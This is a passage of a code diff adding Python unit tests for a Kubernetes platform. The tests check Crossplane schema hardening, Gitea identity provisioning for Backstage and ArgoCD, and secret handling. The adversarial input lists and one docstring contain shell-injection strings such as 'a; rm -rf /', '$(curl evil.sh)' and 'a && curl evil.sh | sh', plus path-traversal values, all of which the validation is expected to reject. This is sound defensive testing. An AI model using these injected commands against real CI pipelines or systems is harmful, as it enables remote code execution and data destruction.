+        self.assertIn('tls:{certificates:{"digiorg.local"', compact)
+
+
+class CrossRepoPublishPathContractTest(unittest.TestCase):
+    """Static, read-only cross-repo contract check against core-portal's own
+    publishPhase.git config. core-portal is out of scope to edit for this
+    issue; this only reads it. Skips cleanly when core-portal is not checked
+    out at the conventional sibling path (e.g. a CI checkout of core alone)."""
+
+    @classmethod
+    def setUpClass(cls):
+        if not os.path.isfile(CORE_PORTAL_APP_CONFIG):
+            raise unittest.SkipTest(
+                "core-portal not checked out at %s -- skipping cross-repo contract check"
+                % CORE_PORTAL_APP_CONFIG
+            )
+        with open(CORE_PORTAL_APP_CONFIG, encoding="utf-8") as fh:
+            portal_config = yaml.safe_load(fh)
+        cls.publish_git = portal_config["kubernetesIngestor"]["crossplane"]["xrds"]["publishPhase"]["git"]
+
+    def _parse_gitea_ingestor_repo_url(self, repo_url):
+        # kubernetesIngestor's Gitea repoUrl shape: "<host>?owner=<org>&repo=<repo>"
+        host, _, query = repo_url.partition("?")
+        params = dict(pair.split("=", 1) for pair in query.split("&") if "=" in pair)
+        return host, params.get("owner"), params.get("repo")
+
+    def test_target_path_matches_the_app_config_applications_watched_path(self):
+        app = _app("app-config")
+        self.assertEqual(self.publish_git["targetPath"], app["spec"]["source"]["path"])
+
+    def test_target_branch_matches_the_app_config_applications_revision(self):
+        app = _app("app-config")
+        self.assertEqual(self.publish_git["targetBranch"], app["spec"]["source"]["targetRevision"])
+
+    def test_repo_host_owner_and_name_match_the_app_config_applications_source(self):
+        app = _app("app-config")
+        host, owner, repo = self._parse_gitea_ingestor_repo_url(self.publish_git["repoUrl"])
+        self.assertEqual(f"https://{host}/gitea/{owner}/{repo}.git", app["spec"]["source"]["repoURL"])
+
+
+class ControlFlowOrderingTest(SetupTextFixture):
+    """The three new Phase-3 steps run after Gitea's own org/OIDC setup
+    (they need the DigiOrg org + Owners team to exist) and before the
+    Phase-6 global convergence gate that waits on their Applications."""
+
+    def test_new_steps_run_after_org_creation_inside_configure_gitea(self):
+        body = _func_body(self.text, "configure_gitea")
+        org_step = body.index("Ensuring DigiOrg organisation exists")
+        app_config_step = body.index("configure_app_config_repo")
+        gitea_creds_step = body.index("configure_crossplane_gitea_credentials")
+        argocd_access_step = body.index("configure_argocd_gitea_access")
+        self.assertTrue(org_step < app_config_step < gitea_creds_step < argocd_access_step)
+
+    def test_configure_gitea_runs_before_the_final_gate(self):
+        up = _func_body(self.text, '"main up"')
+        self.assertLess(up.index("configure_gitea"), up.index("wait_for_argocd_apps"))
+
+
+if __name__ == "__main__":
+    unittest.main(verbosity=2)

--- a/platform/tests/test_appclaim_delivery.py
+++ b/platform/tests/test_appclaim_delivery.py
@@ -129,15 +129,21 @@ class SecretTransportTest(unittest.TestCase):
                 "with open(os.environ['KUBECTL_ARGV_LOG'], 'a', encoding='utf-8') as log: "
                 "log.write(json.dumps(args) + '\\n')\n"
                 "scenario = os.environ.get('FAKE_SCENARIO', 'success')\n"
-                "if 'apply' in args:\n"
+                "path = os.environ['MANIFEST_LOG']\n"
+                "if 'get' in args and '--ignore-not-found' in args:\n"
+                "    if os.path.exists(path): print(open(path, encoding='utf-8').read(), end='')\n"
+                "elif 'apply' in args:\n"
                 "    data = sys.stdin.read()\n"
                 "    if scenario == 'apply_failure': sys.exit(1)\n"
-                "    open(os.environ['MANIFEST_LOG'], 'w', encoding='utf-8').write(data)\n"
+                "    open(path, 'w', encoding='utf-8').write(data)\n"
                 "    print('secret/x configured')\n"
+                "elif 'annotate' in args:\n"
+                "    print('secret/x annotated')\n"
                 "elif 'get' in args:\n"
                 "    if scenario == 'readback_failure': sys.exit(1)\n"
-                "    obj = json.load(open(os.environ['MANIFEST_LOG'], encoding='utf-8'))\n"
-                "    key = list(obj['data'].keys())[0]\n"
+                "    if any('metadata.annotations' in arg for arg in args): print('', end=''); sys.exit(0)\n"
+                "    obj = json.load(open(path, encoding='utf-8'))\n"
+                "    key = next(k for k in obj['data'] if any(k in arg for arg in args))\n"
                 "    value = obj['data'][key]\n"
                 "    print('d3Jvbmc=' if scenario == 'readback_mismatch' else value, end='')\n"
                 "else:\n"
@@ -146,12 +152,15 @@ class SecretTransportTest(unittest.TestCase):
         os.chmod(fake, 0o755)
         return fake
 
-    def _run_opaque_secret_transport(self, scenario):
+    def _run_opaque_secret_transport(self, scenario, initial=None):
         sentinel = "sentinel-opaque-secret-value-never-in-argv"
         with tempfile.TemporaryDirectory() as tmp:
             self._fake_kubectl_single_key(tmp, scenario)
             argv_log = os.path.join(tmp, "kubectl-argv")
             manifest_log = os.path.join(tmp, "manifest.json")
+            if initial is not None:
+                with open(manifest_log, "w", encoding="utf-8") as fh:
+                    json.dump(initial, fh)
             env = os.environ.copy()
             env["PATH"] = tmp + os.pathsep + env.get("PATH", "")
             env["KUBECTL_ARGV_LOG"] = argv_log
@@ -180,6 +189,25 @@ class SecretTransportTest(unittest.TestCase):
         self.assertEqual(manifest["metadata"]["namespace"], "crossplane-system")
         import base64 as b64
         self.assertEqual(b64.b64decode(manifest["data"]["token"]).decode(), sentinel)
+
+    def test_opaque_secret_full_state_ssa_preserves_unrelated_keys_and_scrubs_annotation(self):
+        initial = {
+            "apiVersion": "v1", "kind": "Secret", "type": "Opaque",
+            "metadata": {
+                "name": "crossplane-gitea-credentials", "namespace": "crossplane-system",
+                "annotations": {"kubectl.kubernetes.io/last-applied-configuration": "credential-copy"},
+            },
+            "data": {"unrelated": "c2VudGluZWw="},
+        }
+        result, _, _, manifest = self._run_opaque_secret_transport("success", initial=initial)
+        self.assertEqual(result.returncode, 0, result.stderr)
+        assert manifest is not None
+        self.assertIn("unrelated", manifest["data"])
+        self.assertIn("token", manifest["data"])
+        self.assertNotIn(
+            "kubectl.kubernetes.io/last-applied-configuration",
+            manifest["metadata"].get("annotations", {}),
+        )
 
     def test_opaque_secret_apply_failure_is_fatal(self):
         result, _, _, _ = self._run_opaque_secret_transport("apply_failure")
@@ -212,9 +240,11 @@ class SecretTransportTest(unittest.TestCase):
                 "log.write(json.dumps(args) + '\\n')\n"
                 "scenario = os.environ.get('FAKE_SCENARIO', 'success')\n"
                 "pre_existing = os.environ.get('PRE_EXISTING') == '1'\n"
-                "if 'get' in args and 'jsonpath={.data.password}' not in args:\n"
+                "if 'get' in args and '-o' not in args:\n"
                 # existence probe used by the resume-preserve short-circuit
                 "    sys.exit(0 if pre_existing else 1)\n"
+                "elif 'annotate' in args:\n"
+                "    print('secret/x annotated')\n"
                 "elif 'apply' in args:\n"
                 "    data = sys.stdin.read()\n"
                 "    if scenario == 'apply_failure': sys.exit(1)\n"
@@ -222,6 +252,7 @@ class SecretTransportTest(unittest.TestCase):
                 "    print('secret/x configured')\n"
                 "elif 'get' in args:\n"
                 "    if scenario == 'readback_failure': sys.exit(1)\n"
+                "    if any('metadata.annotations' in arg for arg in args): print('', end=''); sys.exit(0)\n"
                 "    obj = json.load(open(os.environ['MANIFEST_LOG'], encoding='utf-8'))\n"
                 "    value = obj['data']['password']\n"
                 "    print('d3Jvbmc=' if scenario == 'readback_mismatch' else value, end='')\n"

--- a/platform/tests/test_appclaim_messaging_subject_hardening.py
+++ b/platform/tests/test_appclaim_messaging_subject_hardening.py
@@ -1,0 +1,133 @@
+#!/usr/bin/env python3
+"""Issue #285 runtime blocker (JetStream subject collision): the Application
+XRD's `spec.messaging.subjects[]` previously accepted any string with no
+`uniqueItems` constraint. This locks the schema-level fix, mirroring
+`test_appclaim_service_field_hardening.py`'s style: both a `pattern`
+rejecting unsafe NATS subjects (e.g. a bare `>` is only valid as the final,
+whole token -- `>>>` is never a valid subject) and `uniqueItems: true` on
+the array (rejecting literal duplicate subjects outright), while still
+accepting subjects that only *collide after sanitization* (case/separator
+variants) -- the render-side fix for those lives in core-catalog's pipeline
+Composition (index-based Stream/Consumer naming).
+
+Run:
+    python3 platform/tests/test_appclaim_messaging_subject_hardening.py
+"""
+
+import os
+import sys
+import unittest
+
+try:
+    import yaml
+except ImportError:  # pragma: no cover - environment guard
+    sys.stderr.write("PyYAML is required: pip install pyyaml\n")
+    raise
+
+try:
+    import jsonschema
+except ImportError:  # pragma: no cover - environment guard
+    sys.stderr.write("jsonschema is required: pip install jsonschema\n")
+    raise
+
+REPO_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", ".."))
+XRD = os.path.join(REPO_ROOT, "crossplane", "xrds", "application.yaml")
+
+
+def _load_schema():
+    with open(XRD, encoding="utf-8") as fh:
+        doc = yaml.safe_load(fh)
+    versions = doc["spec"]["versions"]
+    assert len(versions) == 1
+    return versions[0]["schema"]["openAPIV3Schema"]
+
+
+def _base_spec():
+    return {"appName": "myapp", "team": "platform-team", "size": "S"}
+
+
+def _validator(schema):
+    jsonschema.Draft7Validator.check_schema(schema)
+    return jsonschema.Draft7Validator(schema)
+
+
+def _document_with_subjects(subjects):
+    spec = _base_spec()
+    spec["messaging"] = {"enabled": True, "subjects": subjects}
+    return {"spec": spec}
+
+
+def _is_valid(validator, document):
+    return len(list(validator.iter_errors(document))) == 0
+
+
+SAFE_SUBJECTS = [
+    "myapp.events.>",
+    "myapp.commands",
+    "myapp.audit.v1",
+    "myapp-events",
+    "myapp.Events",
+]
+
+ADVERSARIAL_SUBJECTS = [
+    ">>>",
+    "",
+    "..",
+    ".leading-dot",
+    "trailing-dot.",
+    "a b",
+    "a\nb",
+    "a;touch pwned",
+    "a$(touch pwned)",
+]
+
+
+class MessagingSubjectsSchemaTest(unittest.TestCase):
+    @classmethod
+    def setUpClass(cls):
+        schema = _load_schema()
+        cls.validator = _validator(schema)
+        cls.subjects_schema = schema["properties"]["spec"]["properties"]["messaging"]["properties"][
+            "subjects"
+        ]
+
+    def test_unique_items_is_declared(self):
+        self.assertTrue(self.subjects_schema.get("uniqueItems"))
+
+    def test_item_pattern_and_max_length_are_declared(self):
+        item_schema = self.subjects_schema["items"]
+        self.assertIn("pattern", item_schema)
+        self.assertIn("maxLength", item_schema)
+        pattern = item_schema["pattern"]
+        for forbidden in ("(?=", "(?!", "(?<", "\\1", "\\2"):
+            self.assertNotIn(forbidden, pattern)
+
+    def test_safe_subjects_are_accepted(self):
+        for subject in SAFE_SUBJECTS:
+            with self.subTest(subject=repr(subject)):
+                doc = _document_with_subjects([subject])
+                self.assertTrue(_is_valid(self.validator, doc), "subject %r must be accepted" % (subject,))
+
+    def test_adversarial_subjects_are_schema_rejected(self):
+        for subject in ADVERSARIAL_SUBJECTS:
+            with self.subTest(subject=repr(subject)):
+                doc = _document_with_subjects([subject])
+                self.assertFalse(
+                    _is_valid(self.validator, doc), "subject %r must be schema-rejected" % (subject,)
+                )
+
+    def test_duplicate_subjects_are_rejected_by_unique_items(self):
+        doc = _document_with_subjects(["myapp.events", "myapp.events"])
+        self.assertFalse(_is_valid(self.validator, doc))
+
+    def test_case_and_separator_variants_are_not_duplicates(self):
+        # These are distinct, schema-valid subjects even though a naive
+        # sanitizer would collapse them to the same string -- uniqueItems
+        # must not reject them (that collision is a render-time naming
+        # problem, not a schema-level duplicate).
+        doc = _document_with_subjects(["myapp.events", "myapp-events", "myapp.Events"])
+        self.assertTrue(_is_valid(self.validator, doc))
+
+
+if __name__ == "__main__":
+    unittest.main(verbosity=2)

--- a/platform/tests/test_appclaim_publish_credential.py
+++ b/platform/tests/test_appclaim_publish_credential.py
@@ -1,0 +1,229 @@
+#!/usr/bin/env python3
+"""Independent-review follow-up fixes for Issue #285 (digiorg/core).
+
+The first pass of #285 (locked by test_appclaim_delivery.py) wired the
+GitOps sink Application, the claims/ path contract, and least-privilege
+Gitea identities for Crossplane and ArgoCD. Independent review afterwards
+found three remaining blockers this module locks:
+
+  * Backstage's own create-pull-request publish action (core-portal
+    app-config.yaml: integrations.gitea[0].password: ${GITEA_TOKEN}) has no
+    credential wired into core/platform/base/backstage/deployment.yaml, and
+    no dedicated least-privilege identity provisions it -- Backstage would
+    crash-loop or silently publish with no credential.
+  * `gitea admin user create --password "$generated"` puts a freshly
+    generated secret directly into a Kubernetes exec process argument
+    (visible via `ps` on the node) for the crossplane-provisioner and
+    argocd-reader identities.
+  * `configure_crossplane_gitea_credentials` / `configure_argocd_gitea_access`
+    return immediately whenever their token Secret already exists, so a
+    resumed run never repairs team/collaborator membership an operator (or
+    Gitea data loss) may have revoked out-of-band -- only the token value is
+    resume-safe, not the authorization it depends on.
+
+Run:
+    python3 platform/tests/test_appclaim_publish_credential.py
+"""
+
+import os
+import re
+import subprocess
+import sys
+import tempfile
+import unittest
+
+try:
+    import yaml
+except ImportError:  # pragma: no cover - environment guard
+    sys.stderr.write("PyYAML is required: pip install pyyaml\n")
+    raise
+
+REPO_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", ".."))
+SETUP = os.path.join(REPO_ROOT, "scripts", "local-setup.nu")
+DEPLOYMENT = os.path.join(REPO_ROOT, "platform", "base", "backstage", "deployment.yaml")
+
+
+def _read(path):
+    with open(path, encoding="utf-8") as fh:
+        return fh.read()
+
+
+def _func_body(text, name):
+    start = text.index(f"def {name} ")
+    end = text.index("\ndef ", start + 10)
+    return text[start:end]
+
+
+class SetupTextFixture(unittest.TestCase):
+    @classmethod
+    def setUpClass(cls):
+        cls.text = _read(SETUP)
+
+
+class BackstageGiteaTokenDeploymentTest(unittest.TestCase):
+    """Blocker #2: Backstage's Deployment must actually wire GITEA_TOKEN from
+    a dedicated Secret, fail-closed (optional: false)."""
+
+    @classmethod
+    def setUpClass(cls):
+        with open(DEPLOYMENT, encoding="utf-8") as fh:
+            cls.doc = yaml.safe_load(fh)
+        containers = cls.doc["spec"]["template"]["spec"]["containers"]
+        cls.env = {e["name"]: e for e in containers[0]["env"]}
+
+    def test_gitea_token_env_is_present(self):
+        self.assertIn("GITEA_TOKEN", self.env)
+
+    def test_gitea_token_is_sourced_from_a_dedicated_secret_not_backstage_secrets(self):
+        ref = self.env["GITEA_TOKEN"]["valueFrom"]["secretKeyRef"]
+        # Must NOT be the shared multi-key backstage-secrets object: a single-key
+        # `persist_opaque_secret` apply against that object would silently wipe
+        # its other keys (POSTGRES_PASSWORD, AUTH_SESSION_SECRET, ...).
+        self.assertNotEqual(ref["name"], "backstage-secrets")
+        self.assertEqual(ref["name"], "backstage-gitea-credentials")
+        self.assertEqual(ref["key"], "GITEA_TOKEN")
+
+    def test_gitea_token_is_required_not_optional(self):
+        ref = self.env["GITEA_TOKEN"]["valueFrom"]["secretKeyRef"]
+        self.assertEqual(ref.get("optional"), False)
+
+
+class BackstageGiteaPublisherIdentityTest(SetupTextFixture):
+    """A dedicated least-privilege Gitea identity provisions the GITEA_TOKEN
+    Backstage's own publish action uses -- write access to DigiOrg/app-config
+    only, never the platform bootstrap token or the other two #285
+    identities (crossplane-provisioner, argocd-reader)."""
+
+    def test_function_is_defined_exactly_once(self):
+        self.assertEqual(
+            self.text.count("def configure_backstage_gitea_publisher ["), 1
+        )
+
+    def test_configure_gitea_calls_it_after_argocd_access(self):
+        body = _func_body(self.text, "configure_gitea")
+        self.assertIn("configure_backstage_gitea_publisher", body)
+        self.assertLess(
+            body.index("configure_argocd_gitea_access"),
+            body.index("configure_backstage_gitea_publisher"),
+        )
+
+    def test_token_is_write_repository_only(self):
+        body = _func_body(self.text, "configure_backstage_gitea_publisher")
+        self.assertIn("--scopes write:repository --raw", body)
+        self.assertNotIn("write:admin", body)
+        self.assertNotIn("write:organization", body)
+
+    def test_is_a_write_collaborator_on_app_config_not_an_org_member(self):
+        body = _func_body(self.text, "configure_backstage_gitea_publisher")
+        self.assertIn("collaborators/backstage-appclaim-publisher", body)
+        self.assertIn('\\"permission\\":\\"write\\"', body)
+        self.assertNotIn("/teams/", body)
+
+    def test_never_reuses_the_bootstrap_admin_or_sibling_identities(self):
+        body = _func_body(self.text, "configure_backstage_gitea_publisher")
+        self.assertNotIn("gitea_admin_password", body)
+        self.assertNotIn("digiorgadmin", body)
+        self.assertNotIn("crossplane-provisioner", body)
+        self.assertNotIn("argocd-reader", body)
+
+    def test_credential_never_appears_in_argv_only_stdin(self):
+        body = _func_body(self.text, "configure_backstage_gitea_publisher")
+        for match in re.finditer(r"curl[^\n']*", body):
+            self.assertNotIn('-H "Authorization', match.group(0))
+
+    def test_persists_into_the_dedicated_backstage_secret_key(self):
+        body = _func_body(self.text, "configure_backstage_gitea_publisher")
+        self.assertIn(
+            'persist_opaque_secret "backstage" "backstage-gitea-credentials" "GITEA_TOKEN"',
+            body,
+        )
+
+
+class GiteaUserCreationNeverPutsPasswordInArgvTest(SetupTextFixture):
+    """Blocker #3: generated passwords must never be interpolated into a
+    `gitea admin user create --password ...` process argument. The identity
+    authenticates only via its later admin-generated access token, so the
+    Gitea CLI's own `--random-password` (stdout discarded, never printed) is
+    sufficient -- and the exact upstream-validated mechanism."""
+
+    def test_random_password_helper_is_defined(self):
+        self.assertEqual(
+            self.text.count("def gitea_create_user_random_password ["), 1
+        )
+
+    def test_helper_uses_random_password_flag_not_a_literal_argv_password(self):
+        body = _func_body(self.text, "gitea_create_user_random_password")
+        self.assertIn("--random-password", body)
+        self.assertIn("--random-password-length", body)
+        self.assertNotRegex(body, r'--password\s+"')
+
+    def test_helper_never_prints_the_generated_password(self):
+        body = _func_body(self.text, "gitea_create_user_random_password")
+        self.assertNotIn("print $create_result.stdout", body)
+        self.assertNotIn("print ($create_result.stdout", body)
+
+    def test_crossplane_provisioner_and_argocd_reader_use_the_helper(self):
+        for fn, username in (
+            ("configure_crossplane_gitea_credentials", "crossplane-provisioner"),
+            ("configure_argocd_gitea_access", "argocd-reader"),
+        ):
+            with self.subTest(fn=fn):
+                body = _func_body(self.text, fn)
+                self.assertIn("gitea_create_user_random_password", body)
+                self.assertIn(username, body)
+                # No leftover generated-password argv interpolation for this identity.
+                self.assertNotRegex(body, r'--password\s+"\(\$\w*password\w*\)"')
+
+    def test_generated_password_variables_are_gone_from_both_functions(self):
+        for fn in ("configure_crossplane_gitea_credentials", "configure_argocd_gitea_access"):
+            body = _func_body(self.text, fn)
+            self.assertNotIn("(generate_password)", body)
+
+
+class GiteaIdentityResumeDriftRepairTest(SetupTextFixture):
+    """Blocker #9: an existing token Secret must not skip re-verifying that
+    the underlying Gitea user/team/collaborator authorization still exists.
+    Only token generation (which would rotate the credential) may be skipped
+    once the Secret is already present -- membership repair must run first,
+    unconditionally."""
+
+    def _assert_membership_repaired_before_short_circuit(self, fn_name, secret_marker, membership_marker):
+        body = _func_body(self.text, fn_name)
+        secret_exists_check = body.index("secret_exists")
+        membership_index = body.index(membership_marker)
+        # "secret_exists" must be *read* near the top (to compute the flag) but
+        # the actual short-circuit `if $secret_exists { ... return }` must come
+        # strictly after the membership repair call, not before it.
+        return_gate = body.index("if $secret_exists {")
+        self.assertLess(secret_exists_check, membership_index)
+        self.assertLess(
+            membership_index,
+            return_gate,
+            f"{fn_name}: membership repair ({membership_marker!r}) must run "
+            "before the resume short-circuit, not be skipped by it",
+        )
+
+    def test_crossplane_credentials_repairs_team_membership_before_returning(self):
+        self._assert_membership_repaired_before_short_circuit(
+            "configure_crossplane_gitea_credentials",
+            "crossplane-gitea-credentials",
+            "platform-provisioners",
+        )
+
+    def test_argocd_access_repairs_collaborator_before_returning(self):
+        self._assert_membership_repaired_before_short_circuit(
+            "configure_argocd_gitea_access",
+            "app-config-repo-creds",
+            "collaborators/argocd-reader",
+        )
+
+    def test_backstage_publisher_repairs_collaborator_before_returning(self):
+        self._assert_membership_repaired_before_short_circuit(
+            "configure_backstage_gitea_publisher",
+            "backstage-gitea-credentials",
+            "collaborators/backstage-appclaim-publisher",
+        )
+
+
+if __name__ == "__main__":
+    unittest.main(verbosity=2)

--- a/platform/tests/test_appclaim_service_field_hardening.py
+++ b/platform/tests/test_appclaim_service_field_hardening.py
@@ -1,0 +1,247 @@
+#!/usr/bin/env python3
+"""Issue #285 blocker (CI shell injection): `spec.services[].name` and
+`spec.services[].build.context` on the Application XRD
+(`crossplane/xrds/application.yaml`) previously accepted *any* string. Both
+values flow, unquoted in the vulnerable version, into the generated Gitea
+Actions CI workflow YAML that `core-catalog`'s pipeline Composition renders
+(`compositions/local/pipeline.yaml` `buildJobFor`):
+
+    run = "docker build -t ${tag}:${{ gitea.sha }} ${ctx}"
+
+`${ctx}` (from `build.context`) and `svc.name` (via `${tag}` and the
+`build-${svc.name}` job key) are attacker-controlled AppClaim input. Without
+schema validation, a value like `. ; curl evil.sh | sh` or a `build.context`
+of `../../etc` would be accepted by the XRD, rendered verbatim into a shell
+`run:` line, and executed by the Gitea Actions runner (Issue #285 blocker
+#4's act_runner).
+
+This locks the schema-level fix: both fields now carry a `pattern`
+(RE2-compatible -- no lookaround/backreferences, matching what Kubernetes'
+CRD structural-schema validation actually supports) and a `maxLength`, so
+Crossplane's admission-time OpenAPI validation rejects any value that could
+alter shell/YAML/job-key structure *before* the Composition ever renders it.
+
+Run:
+    python3 platform/tests/test_appclaim_service_field_hardening.py
+"""
+
+import copy
+import os
+import sys
+import unittest
+
+try:
+    import yaml
+except ImportError:  # pragma: no cover - environment guard
+    sys.stderr.write("PyYAML is required: pip install pyyaml\n")
+    raise
+
+try:
+    import jsonschema
+except ImportError:  # pragma: no cover - environment guard
+    sys.stderr.write("jsonschema is required: pip install jsonschema\n")
+    raise
+
+REPO_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", ".."))
+XRD = os.path.join(REPO_ROOT, "crossplane", "xrds", "application.yaml")
+
+
+def _load_schema():
+    with open(XRD, encoding="utf-8") as fh:
+        doc = yaml.safe_load(fh)
+    versions = doc["spec"]["versions"]
+    assert len(versions) == 1
+    return versions[0]["schema"]["openAPIV3Schema"]
+
+
+def _base_spec():
+    return {
+        "appName": "myapp",
+        "team": "platform-team",
+        "size": "S",
+    }
+
+
+def _validator(schema):
+    jsonschema.Draft7Validator.check_schema(schema)
+    return jsonschema.Draft7Validator(schema)
+
+
+def _document_with_service(service):
+    spec = _base_spec()
+    spec["services"] = [service]
+    return {"spec": spec}
+
+
+def _is_valid(validator, document):
+    errors = list(validator.iter_errors(document))
+    return len(errors) == 0
+
+
+ADVERSARIAL_SERVICE_NAMES = [
+    "a; rm -rf /",
+    "a && curl evil.sh | sh",
+    "$(curl evil.sh)",
+    "`curl evil.sh`",
+    "a b",
+    "UPPERCASE",
+    "under_score",
+    "dot.name",
+    "-leading-dash",
+    "trailing-dash-",
+    "",
+    "a" * 64,
+]
+
+SAFE_SERVICE_NAMES = [
+    "api",
+    "worker-1",
+    "a",
+    "cron-job-9",
+    "a" * 63,
+]
+
+ADVERSARIAL_BUILD_CONTEXTS = [
+    "/etc",
+    "../secrets",
+    "services/../../etc",
+    "a; rm -rf /",
+    "a && curl evil.sh | sh",
+    "a | sh",
+    "$(curl evil.sh)",
+    "`curl evil.sh`",
+    "a b",
+    "a\nb",
+    "-oops",
+    "",
+]
+
+SAFE_BUILD_CONTEXTS = [
+    ".",
+    "services/api",
+    "src/app_1",
+    "a-b/c_d",
+    "backend",
+]
+
+
+class ServiceNamePatternTest(unittest.TestCase):
+    @classmethod
+    def setUpClass(cls):
+        schema = _load_schema()
+        cls.validator = _validator(schema)
+        cls.name_schema = schema["properties"]["spec"]["properties"]["services"]["items"][
+            "properties"
+        ]["name"]
+
+    def test_pattern_and_max_length_are_declared(self):
+        self.assertIn("pattern", self.name_schema)
+        self.assertIn("maxLength", self.name_schema)
+        # RE2/Kubernetes CRD validation forbids lookaround and backreferences.
+        pattern = self.name_schema["pattern"]
+        for forbidden in ("(?=", "(?!", "(?<", "\\1", "\\2"):
+            self.assertNotIn(forbidden, pattern)
+
+    def test_adversarial_service_names_are_schema_rejected(self):
+        for name in ADVERSARIAL_SERVICE_NAMES:
+            with self.subTest(name=repr(name)):
+                doc = _document_with_service({"name": name, "image": "img", "port": 8080})
+                self.assertFalse(
+                    _is_valid(self.validator, doc),
+                    "service.name %r must be schema-rejected" % (name,),
+                )
+
+    def test_safe_service_names_are_accepted(self):
+        for name in SAFE_SERVICE_NAMES:
+            with self.subTest(name=repr(name)):
+                doc = _document_with_service({"name": name, "image": "img", "port": 8080})
+                self.assertTrue(
+                    _is_valid(self.validator, doc),
+                    "service.name %r must be accepted" % (name,),
+                )
+
+
+class BuildContextPatternTest(unittest.TestCase):
+    @classmethod
+    def setUpClass(cls):
+        schema = _load_schema()
+        cls.validator = _validator(schema)
+        cls.context_schema = schema["properties"]["spec"]["properties"]["services"]["items"][
+            "properties"
+        ]["build"]["properties"]["context"]
+
+    def test_pattern_and_max_length_are_declared(self):
+        self.assertIn("pattern", self.context_schema)
+        self.assertIn("maxLength", self.context_schema)
+        pattern = self.context_schema["pattern"]
+        for forbidden in ("(?=", "(?!", "(?<", "\\1", "\\2"):
+            self.assertNotIn(forbidden, pattern)
+
+    def test_default_is_still_the_repository_root(self):
+        self.assertEqual(self.context_schema["default"], ".")
+
+    def test_adversarial_build_contexts_are_schema_rejected(self):
+        for ctx in ADVERSARIAL_BUILD_CONTEXTS:
+            with self.subTest(ctx=repr(ctx)):
+                doc = _document_with_service(
+                    {
+                        "name": "api",
+                        "image": "img",
+                        "port": 8080,
+                        "build": {"enabled": True, "context": ctx},
+                    }
+                )
+                self.assertFalse(
+                    _is_valid(self.validator, doc),
+                    "build.context %r must be schema-rejected" % (ctx,),
+                )
+
+    def test_safe_build_contexts_are_accepted(self):
+        for ctx in SAFE_BUILD_CONTEXTS:
+            with self.subTest(ctx=repr(ctx)):
+                doc = _document_with_service(
+                    {
+                        "name": "api",
+                        "image": "img",
+                        "port": 8080,
+                        "build": {"enabled": True, "context": ctx},
+                    }
+                )
+                self.assertTrue(
+                    _is_valid(self.validator, doc),
+                    "build.context %r must be accepted" % (ctx,),
+                )
+
+
+class FullDocumentValidationTest(unittest.TestCase):
+    """Belt-and-braces: a realistic multi-service AppClaim spec with one
+    adversarial service among safe ones must still be rejected as a whole
+    (schema validation is not fooled by other valid entries)."""
+
+    @classmethod
+    def setUpClass(cls):
+        cls.validator = _validator(_load_schema())
+
+    def test_one_adversarial_service_among_safe_ones_fails_the_whole_document(self):
+        spec = _base_spec()
+        spec["services"] = [
+            {"name": "api", "image": "img", "port": 8080},
+            {"name": "a; rm -rf /", "image": "img", "port": 9090},
+            {"name": "worker", "image": "img", "port": 7070, "build": {"enabled": True, "context": "../evil"}},
+        ]
+        doc = {"spec": spec}
+        self.assertFalse(_is_valid(self.validator, doc))
+
+    def test_realistic_multi_service_build_document_is_accepted(self):
+        spec = _base_spec()
+        spec["services"] = [
+            {"name": "api", "image": "img", "port": 8080, "build": {"enabled": True, "context": "services/api"}},
+            {"name": "worker", "image": "img", "port": 9090, "build": {"enabled": True}},
+            {"name": "cron", "image": "img", "port": 7070},
+        ]
+        doc = {"spec": spec}
+        self.assertTrue(_is_valid(self.validator, doc))
+
+
+if __name__ == "__main__":
+    unittest.main(verbosity=2)

--- a/platform/tests/test_argo_sync_wave_ordering.py
+++ b/platform/tests/test_argo_sync_wave_ordering.py
@@ -111,13 +111,19 @@ class CoreDataLayerWaveTest(unittest.TestCase):
 class CnpgDecoupledWaveTest(unittest.TestCase):
     """CNPG is optional future-app infrastructure and must never gate core waves."""
 
+    # app-config is deliberately NOT a member here: unlike these, it must sync
+    # AFTER cnpg/cnpg-cluster (an AppClaim's database.enabled path depends on
+    # the CNPG prerequisite being resolvable), not before — see
+    # test_appclaim_delivery.AppConfigDeliveryWiringTest and
+    # apps/platform/app-config.yaml's own wave-11 comment.
     CORE_APPS = (
         "namespaces", "cert-manager", "external-secrets", "nats", "postgresql",
-        "opensearch", "keycloak", "argocd", "backstage", "gitea", "grafana",
+        "opensearch", "keycloak", "argocd", "nats-jetstream-controller",
+        "backstage", "gitea", "grafana",
         "harbor", "jaeger", "landingpage", "opencost", "sonarqube",
         "crossplane", "kyverno", "crossplane-providers", "fluentd",
         "kyverno-policies", "monitoring-extras", "crossplane-provider-configs",
-        "crossplane-xrds", "core-catalog",
+        "crossplane-xrds", "crossplane-harbor-bootstrap", "core-catalog",
     )
 
     def test_cnpg_operator_syncs_after_every_core_application(self):

--- a/platform/tests/test_backstage_image.py
+++ b/platform/tests/test_backstage_image.py
@@ -7,11 +7,11 @@
 ``c74fe7c``/``b77e94a``) were added. Pinning it explained why the deployed UI
 looked unstyled/uncustomized.
 
-``b77e94a1a0e50a834f1844918c4e7287b0764c0b`` is core-portal's current `main`
-HEAD (confirmed via ``gh api repos/digiorg/core-portal/commits``) and CI built
-and pushed it successfully (workflow run 26395858961, conclusion "success").
+``e87210b270ab94539db85e21fd6bc8f943fb7bf4`` is core-portal PR #9's
+reviewed Issue #285 commit and CI built and pushed it successfully
+(workflow run 29983067024, conclusion "success").
 The digest below was resolved independently from the GHCR anonymous registry
-API (``scripts/resolve_digest.py ghcr.io/digiorg/core-portal:b77e94a``), not
+API (``docker buildx imagetools inspect ghcr.io/digiorg/core-portal:e87210b``), not
 invented.
 
 Pure python3 + PyYAML, no cluster/network access::
@@ -28,12 +28,12 @@ REPO_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", ".."))
 DEPLOYMENT = os.path.join(REPO_ROOT, "platform", "base", "backstage", "deployment.yaml")
 VERSIONS_DOC = os.path.join(REPO_ROOT, "docs", "guides", "platform-versions.md")
 
-# Resolved 2026-07-18 via scripts/resolve_digest.py against the live GHCR API,
+# Resolved 2026-07-23 via the live GHCR API,
 # and independently cross-checked against core-portal's commit history/Actions
 # run for that exact commit.
 EXPECTED_IMAGE = (
-    "ghcr.io/digiorg/core-portal:b77e94a"
-    "@sha256:44d00aba125e1e66d712222ec7f64cbc7cce02f05e5f05146af5af996bfe19dd"
+    "ghcr.io/digiorg/core-portal:e87210b"
